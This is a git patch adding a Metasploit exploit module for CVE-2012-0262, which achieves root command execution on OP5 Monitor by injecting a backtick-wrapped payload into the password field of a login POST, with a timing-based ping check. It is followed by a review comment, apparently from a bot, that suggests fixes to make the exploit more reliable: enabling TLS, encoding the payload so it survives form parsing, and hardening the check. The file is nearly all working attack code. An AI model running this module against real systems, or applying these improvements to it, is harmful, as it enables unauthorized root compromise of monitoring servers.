From 4e858aba896c4be9d751c75ade9675d701c6c058 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Sat, 7 Jan 2012 15:13:45 -0600
Subject: [PATCH] Add CVE-2012-0262 Op5 welcome.php Remote Code Execution
---
 modules/exploits/multi/http/op5_welcome.rb | 108 +++++++++++++++++++++
 1 file changed, 108 insertions(+)
 create mode 100644 modules/exploits/multi/http/op5_welcome.rb
diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb
new file mode 100644
index 0000000000..84785e64da
--- /dev/null
+++ b/modules/exploits/multi/http/op5_welcome.rb
@@ -0,0 +1,108 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'OP5 welcome Remote Command Execution',
+ 'Description' => %q{
+ This module exploits an arbitrary root command execution vulnerability in
+ OP5 Monitor welcome. Ekelöw has confirmed that OP5 Monitor versions 5.3.5,
+ 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
+ },
+ 'Author' => [ 'Peter Österberg ' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2012-0262'],
+ ['OSVDB', '78065'],
+ ['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
+ ['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
+ ['URL', 'http://secunia.com/advisories/47417/'],
+ ],
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 1024,
+ 'BadChars' => '`\\|',
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'perl ruby',
+ }
+ },
+ 'Platform' => [ 'unix', 'linux' ],
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'DisclosureDate' => 'Jan 05 2012',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('URI', [true, "The full URI path to /op5config/welcome", "/op5config/welcome"]),
+ ], self.class)
+ end
+
+ def check
+ print_status("Attempting to detect if the OP5 Monitor is vulnerable...")
+ print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+
+ # Try running/timing 'ping localhost' to determine is system is vulnerable
+ start = Time.now
+
+ data = 'do=do=Login&password=`ping -c 10 127.0.0.1`';
+ res = send_request_cgi({
+ 'uri' => datastore['URI'],
+ 'method' => 'POST',
+ 'proto' => 'HTTPS',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'Connection' => 'close',
+ }
+ }, 25)
+ elapsed = Time.now - start
+ if elapsed >= 5
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+
+ data = 'do=do=Login&password=`' + payload.encoded + '`';
+
+ res = send_request_cgi({
+ 'uri' => datastore['URI'],
+ 'method' => 'POST',
+ 'proto' => 'HTTPS',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'Connection' => 'close',
+ }
+ }, 10)
+
+ if(not res)
+ if session_created?
+ print_status("Session created, enjoy!")
+ else
+ print_error("No response from the server")
+ end
+ return
+ end
+ end
+end
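Review bot: Nothing in the new module actually switches the connection to TLS even though the status messages print `https://` and `Opt::RPORT(443)` is registered: no `SSL` option is set, and as far as I can tell the `'proto' => 'HTTPS'` key passed to both `send_request_cgi` calls only changes the protocol token written in the request line rather than enabling SSL in the HttpClient mixin, so by default the POST would go in cleartext to port 443. Registering the option explicitly, `OptBool.new('SSL', [true, 'Use SSL', true]),` next to `Opt::RPORT(443)` and dropping the two `'proto'` entries would make the behaviour match the messages. The hand-built `data` string is also sent without URL-encoding, so a payload containing `&`, `+`, `%` or `#` (none of them in `BadChars`) is mangled by the form parser; passing `'vars_post' => { 'do' => 'do=Login', 'password' => cmd }`, where `cmd` is the backtick-wrapped `payload.encoded`, lets the client encode it. Finally, `check` treats any request slower than five seconds as Vulnerable and never looks at `res`, so a slow host is a false positive and an unreachable one reports Safe; timing a baseline request first and returning `Exploit::CheckCode::Unknown` when `res` is nil would tighten it.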